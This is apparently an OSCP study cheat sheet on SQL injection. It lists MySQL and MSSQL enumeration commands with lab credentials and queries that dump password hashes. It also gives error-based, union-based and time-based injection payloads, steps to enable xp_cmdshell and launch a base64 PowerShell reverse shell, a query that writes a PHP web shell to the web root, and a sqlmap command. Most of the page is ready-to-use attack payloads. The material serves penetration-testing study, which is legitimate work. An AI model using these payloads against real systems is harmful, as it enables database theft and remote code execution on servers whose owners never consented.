SQL Injection (SQLi)
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries a web application makes to its database. By manipulating input fields.
Enumeration
MySQL
MySQL is a popular open-source relational database management system (RDBMS) often used in web applications. It’s a common target for attackers due to its widespread use and the potential to expose sensitive data through SQL injection or other vulnerabilities.
connect to mysql
remotely
mysql -u root -p'root' -h 192.168.191.16 -P 3306
retrieve the version of the running SQL instance
select version();
retrieve the current username and hostname for the MySQL connection.
select system_user();
list all of the databases running in the MYSQL session.
show databases;
retrieve mysql user password hash
select user, authentication_string from mysql.user where user = '<username>';
A trick to output vertically and get normal formatting
select * from mysql.user where user = 'offsec'\G;
MSSQL
MSSQL is a database management system that natively integrates into the Windows ecosystem.
Windows has a built-in command-line tool named SQLCMD, that allows SQL queries to be run through the Windows command prompt or even remotely from another machine.
connect to mssql using windows authentication
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
retrieve the version of the running SQL instance
select @@version;
list all of the databases running in the MYSQL session.
select name from sys.databases;
list dbo
users of the current database
select * from offsec.dbo.users;
list all of the database tables
select * from offsec.information_schema.tables;
Manual Exploitation
Error Based
Error-based SQL injection relies on extracting information from the database by triggering error messages that reveal valuable details.
The following examples show how to trigger errors and extract information using Error-Based injection:
' or 1=1 in (select @@version)-- -
' or 1=1 in (select password from users where username = 'admin')-- -
Union Based
Union-based SQL injection enables attackers to concatenate results of malicious query with a legitimate one by using union
operator, allowing them to retrieve additional information from other tables.
In order to make the union-based SQL injection work, the attacker must satisfy two conditions:
Ensure that the number of columns in the injected query match those of the original query .
The number of columns can be found using ORDER BY
and incrementing the number until the query failed:
' ORDER BY 1-- -
' ORDER BY 2-- -
' ORDER BY 3-- -
' ORDER BY 4-- -
etc...
It's less recommended but it possible also to enumerate the number of columns using UNION
and NULL
values until the query works:
' UNION SELECT NULL-- -
' UNION SELECT NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL,NULL-- -
etc...
Ensure that the data types in the injected query match those of the original query.
The following examples describes the process of finding string column, when the query works means the column using 'a'
is a string column.
' UNION SELECT 'a',NULL,NULL,NULL-- -
' UNION SELECT NULL,'a',NULL,NULL-- -
' UNION SELECT NULL,NULL,'a',NULL-- -
' UNION SELECT NULL,NULL,NULL,'a'-- -
etc...
Boolean-Based
Boolean-based SQL injection is used in case the query does not reflect the results of the injected query, so it relies on extracting information by using conditions and changes of the web application.
http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //
MSSQL System Procedures
SQL Server supports the following system stored procedures that provide an interface from an instance of SQL Server to external programs, for various maintenance activities.
xp_cmdshell procedure allows sysadmin to execute os commands
Enable xp_cmdshell
procedure:
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
exec('sp_configure''show+advanced+option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')
Execute commands using xp_cmdshell:
EXECUTE xp_cmdshell 'whoami';
exec master..xp_cmdshell 'powershell -e <base64_revshell>'
Create Files
It's possible to create a file on the server disk using SQL query for example:
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/tmp/webshell.php"
Automated Exploitation
sqlmap is a tool which used to automate exploit a SQLi vulnerability given request with the vulnerable parameter.
sqlmap is not allowed in the OSCP exam so I won't dig in it.
sqlmap -r request.txt -p item
References
Last updated